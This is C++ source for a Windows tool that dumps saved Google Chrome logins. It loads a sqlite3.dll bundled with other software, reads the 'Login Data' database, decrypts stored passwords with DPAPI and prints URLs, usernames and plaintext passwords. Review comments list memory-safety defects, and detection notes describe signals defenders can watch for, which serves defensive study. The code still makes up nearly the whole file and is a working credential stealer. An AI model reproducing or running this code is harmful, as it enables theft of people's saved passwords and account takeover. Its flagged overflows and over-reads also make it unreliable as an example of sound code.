- #include <windows.h>
- #include <iostream>
- #include <ShlObj.h>
- #include <io.h>
- using namespace std;
- #pragma comment(lib,"crypt32")
// Looks up where Google Chrome is installed.
// Reads the "Path" value under
// HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe and
// returns a heap copy of it (new[]); the caller owns the buffer and must
// delete[] it. Returns NULL only when the key cannot be opened.
// In this file the result is used solely as an "is Chrome installed" gate and
// is printed; it is not used to build the database path.
// NOTE(review): the RegQueryValueEx result is not checked, so a missing "Path"
// value yields an empty string instead of NULL. A value that fills all 260
// bytes without a terminator would leave `path` unterminated for strlen/strcpy.
char * readRegistryValue(){
    LPCSTR value = "Path";
    HKEY hkey = NULL;
    // NOTE(review): string literal bound to a non-const char* (deprecated in C++).
    char * sk = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\chrome.exe";
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,sk,0,KEY_READ,&hkey) != ERROR_SUCCESS)
    {
        return NULL;
    }
    char path[MAX_PATH] = {0};
    DWORD dw = 260; // size of `path` in bytes (MAX_PATH)
    RegQueryValueEx(hkey,value,0,0,(BYTE *)path,&dw);
    RegCloseKey(hkey);
    char *ret = new char[strlen(path)+1];
    strcpy(ret,path);
    return ret;
    // Ownership passes to the caller, so the buffer is not freed here.
}
// Hands the buffer at `pass` to CryptUnprotectData (DPAPI) and, on success,
// returns the plaintext as a NUL-terminated new char[1024] that the caller must
// delete[]. Returns NULL when DPAPI rejects the input.
// No optional entropy and no flags are passed, so the call relies entirely on
// the DPAPI context of the account the process runs under.
// Detection note: a process other than the browser calling CryptUnprotectData
// shortly after reading a browser credential store is a behaviour worth
// alerting on.
// NOTE(review): defects visible in this block:
//  - memcpy reads 1024 bytes from `pass` whatever its real size (over-read);
//    `trick` is only used to derive the constant 1024.
//  - in.cbData is the constant 1025, not the length of the stored blob.
//  - the copy loop is not bounded by the 1024-byte `str` buffer, so a larger
//    out.cbData overflows the heap allocation.
//  - out.pbData is never released (the API allocates it for the caller) and
//    `str` leaks on the failure path.
char *Crack(BYTE *pass){
    DATA_BLOB in;
    DATA_BLOB out;
    BYTE trick[1024];
    memcpy(trick,pass,1024);
    int size = sizeof(trick) / sizeof(trick[0]); // always 1024
    in.pbData = pass;
    in.cbData = size+1; // strlen cannot be used on the blob because it may contain NUL bytes, so a fixed size is passed instead
    char *str = new char[1024];
    if (CryptUnprotectData(&in,NULL,NULL,NULL,NULL,0,&out)){
        // int vs DWORD comparison; copies every output byte without a bound check.
        for(int i = 0; i<out.cbData; i++)
            str[i] = out.pbData[i];
        str[out.cbData]='\0';
        return str;
    }
    else
        return NULL; // decryption failed
}
// Resolves a shell folder identified by the CSIDL value `id` into `ret` via
// SHGetFolderPath and returns true on success. main() calls it with 0x1C
// (local application data).
// `ret` must point to a buffer of at least MAX_PATH characters; the size is
// not passed in and cannot be checked here.
// CSIDL_FLAG_CREATE asks the shell to create the folder if it does not exist.
// NOTE(review): sizeof(ret) is the size of a pointer, not of the caller's
// buffer, so the memset clears only the first 4 or 8 bytes.
bool getPath(char *ret,int id){
    memset(ret,0,sizeof(ret));
    if(SUCCEEDED(SHGetFolderPath(NULL,id | CSIDL_FLAG_CREATE,NULL,SHGFP_TYPE_CURRENT,ret)))
        return true;
    return false;
}
// Recursively walks `dir` looking for a file named exactly "sqlite3.dll" and
// writes its full path into `sqldll`. `sqldll` is left untouched when nothing
// is found, so the caller must pre-zero it; it is assumed to hold at least
// MAX_PATH characters (not checked here).
// Detection note: the effect is that this program loads whichever sqlite3.dll
// another installed product happens to ship; a module load of sqlite3.dll from
// an unrelated application's directory is an observable signal.
// NOTE(review): defects visible in this block:
//  - every sprintf is unbounded; paths longer than MAX_PATH overflow the
//    stack buffers (and `sqldll`).
//  - `dir` is used without a NULL check (main passes getenv() straight in).
//  - the handle from _findfirst is stored in a long (truncates where the
//    handle is wider) and is never released with _findclose.
//  - the entry returned by _findfirst itself is never examined; the loop
//    starts with _findnext.
//  - file.attrib != _A_SUBDIR is an equality test, not a bit test, and the
//    else branch recurses into plain files as well as directories (the nested
//    _findfirst is left to fail for them).
void find_file(char *dir, char *sqldll)
{
    char szDir[MAX_PATH]={0};
    sprintf(szDir,"%s\\*.*",dir);
    _finddata_t file;
    long re = _findfirst(szDir,&file);
    if( -1l == re )
        return;
    while( _findnext( re,&file ) == 0)
    {
        // Skip the self and parent entries to avoid infinite recursion.
        if(strcmp(file.name,".") == 0 || strcmp(file.name,"..") == 0)
            continue;
        if( file.attrib != _A_SUBDIR && !strcmp(file.name, "sqlite3.dll"))
        {
            sprintf(sqldll,"%s\\%s",dir,file.name);
            // First match wins; stop scanning this directory.
            break;
        }
        else
        {
            char szSubDir[MAX_PATH]={0};
            sprintf(szSubDir,"%s\\%s",dir,file.name);
            find_file(szSubDir,sqldll);
            /*
             * Stop scanning as soon as a nested call has filled in `sqldll`;
             * this relies on the buffer having been zeroed by the caller.
             */
            if (strstr(sqldll, "sqlite"))
                break;
        }
    }
}
// Local re-declarations of the few SQLite result codes and opaque types used
// below, so the file builds without sqlite3.h or an import library.
#define SQLITE_OK 0
#define SQLITE_ROW 100
// Empty on purpose: the function pointers use the compiler's default calling convention.
#define SQLITE_API
typedef struct sqlite3 sqlite3;
typedef struct sqlite3_stmt sqlite3_stmt;
// Function-pointer types matching the SQLite entry points resolved at run time.
typedef int(SQLITE_API *fpSqliteOpen)(const char *, sqlite3 **);
typedef int(SQLITE_API *fpSqlitePrepare_v2)(sqlite3 *, const char *, int, sqlite3_stmt **, const char **);
typedef int(SQLITE_API *fpSqliteStep)(sqlite3_stmt *);
typedef const unsigned char *(SQLITE_API *fpSqliteColumnText)(sqlite3_stmt*, int);
typedef int(SQLITE_API *fpSqliteFinalize)(sqlite3_stmt *);
typedef int(SQLITE_API *fpSqliteClose)(sqlite3 *);
// NOTE(review): upstream sqlite3_errmsg returns const char *; the const is dropped here.
typedef char *(SQLITE_API *fpsqlite3_errmsg)(sqlite3 *);
// Globals named after the real API; main() fills them in with GetProcAddress.
// They are NULL until then and are never checked before being called.
fpSqliteOpen sqlite3_open;
fpSqlitePrepare_v2 sqlite3_prepare_v2;
fpSqliteStep sqlite3_step;
fpSqliteColumnText sqlite3_column_text;
fpSqliteFinalize sqlite3_finalize;
fpSqliteClose sqlite3_close;
fpsqlite3_errmsg sqlite3_errmsg;
// Entry point. Sequence of observable actions:
//  1. searches %ProgramFiles% recursively for any sqlite3.dll and loads it;
//  2. resolves seven SQLite entry points from that module;
//  3. checks the App Paths registry key to decide whether Chrome is installed;
//  4. opens "<local app data>\Google\Chrome\User Data\Default\Login Data" and
//     selects origin_url, username_value and password_value from `logins`;
//  5. prints each URL and user name, passes password_value to Crack() and
//     prints the result to stdout.
// Only the "Default" profile is read.
// Detection note: steps 1 and 4 are the useful signals - a process that is not
// the browser opening the Login Data file, and a sqlite3.dll module load from
// another product's install directory.
// NOTE(review): `void main` is non-standard; main should return int.
void main(){
    // Locate a sqlite3.dll that some other installed software already ships.
    char szCurrentPath[MAX_PATH] = {0};
    // NOTE(review): szProgrameFiles is filled in but never used; the search
    // below takes its root from getenv(), which may return NULL.
    char szProgrameFiles[MAX_PATH] = {0};
    GetEnvironmentVariable("ProgramFiles", szProgrameFiles, MAX_PATH);
    find_file(getenv("ProgramFiles"), szCurrentPath);
    HMODULE sqliteLib = NULL;
    // NOTE(review): an array name is never null, so this condition is always
    // true and the LoadLibrary("sqlite3.dll") fallback is unreachable; when
    // nothing was found LoadLibrary receives an empty string.
    if ( szCurrentPath ) {
        printf("[+] use %s to import need functions\n", szCurrentPath);
        sqliteLib = LoadLibrary(szCurrentPath);
    }
    else
        sqliteLib = LoadLibrary("sqlite3.dll");
    if (sqliteLib){
        // Resolve the SQLite functions from the loaded module.
        // NOTE(review): none of the GetProcAddress results is checked for NULL.
        sqlite3_open = (fpSqliteOpen)GetProcAddress(sqliteLib,"sqlite3_open");
        sqlite3_prepare_v2 = (fpSqlitePrepare_v2)GetProcAddress(sqliteLib,"sqlite3_prepare_v2");
        sqlite3_step = (fpSqliteStep)GetProcAddress(sqliteLib,"sqlite3_step");
        sqlite3_column_text = (fpSqliteColumnText)GetProcAddress(sqliteLib,"sqlite3_column_text");
        sqlite3_finalize = (fpSqliteFinalize)GetProcAddress(sqliteLib,"sqlite3_finalize");
        sqlite3_close = (fpSqliteClose)GetProcAddress(sqliteLib,"sqlite3_close");
        sqlite3_errmsg = (fpsqlite3_errmsg)GetProcAddress(sqliteLib, "sqlite3_errmsg");
        char *installPath = readRegistryValue();
        if (installPath != NULL){
            printf("[+] Installed in: %s\n",installPath);
            // Read the stored logins through the dynamically resolved SQLite API.
            // NOTE(review): stmt and db are uninitialised until the calls below succeed.
            sqlite3_stmt *stmt;
            sqlite3 *db;
            char databasePath[260];
            // 0x1C is CSIDL_LOCAL_APPDATA. The return value is ignored, so a
            // failure leaves databasePath only partly initialised before strcat.
            getPath(databasePath,0x1C);
            // NOTE(review): unbounded strcat into a 260-byte buffer.
            strcat(databasePath,"\\Google\\Chrome\\User Data\\Default\\Login Data");
            char *query = "SELECT origin_url, username_value, password_value FROM logins";
            // Open the database
            if ( sqlite3_open(databasePath, &db) == SQLITE_OK) {
                if (sqlite3_prepare_v2(db, query, -1, &stmt, 0) == SQLITE_OK) {
                    // One iteration per row of the logins table.
                    while (sqlite3_step(stmt) == SQLITE_ROW) {
                        char *url = (char *)sqlite3_column_text(stmt,0);
                        char *username = (char *)sqlite3_column_text(stmt,1);
                        // The only protected column; it is fetched as text, so
                        // its length is not known to Crack().
                        BYTE *password = (BYTE *)sqlite3_column_text(stmt,2);
                        printf("Url: %s\n",url);
                        printf("Username: %s\n",username);
                        char *decrypted = Crack(password);
                        // NOTE(review): decrypted is NULL when Crack() fails and
                        // is passed to %s unchecked.
                        printf("Password: %s\n",decrypted);
                        delete[] decrypted;
                    }
                }
                else {
                    printf("Error preparing database: %s\n", sqlite3_errmsg(db));
                }
                // NOTE(review): also reached when prepare failed, in which case
                // stmt was never assigned by this code.
                sqlite3_finalize(stmt);
                sqlite3_close(db);
            }
            else
                printf("Error opening database: %s\n", sqlite3_errmsg(db));
        }
        else
            printf("Google Chrome is not installed!\n");
        delete[]installPath; // delete[] on NULL is a no-op
        FreeLibrary(sqliteLib);
    }
    else
        printf("Necessary sqlite dll not found!\n");
    // Keep the console window open until a key is pressed.
    cin.get();
}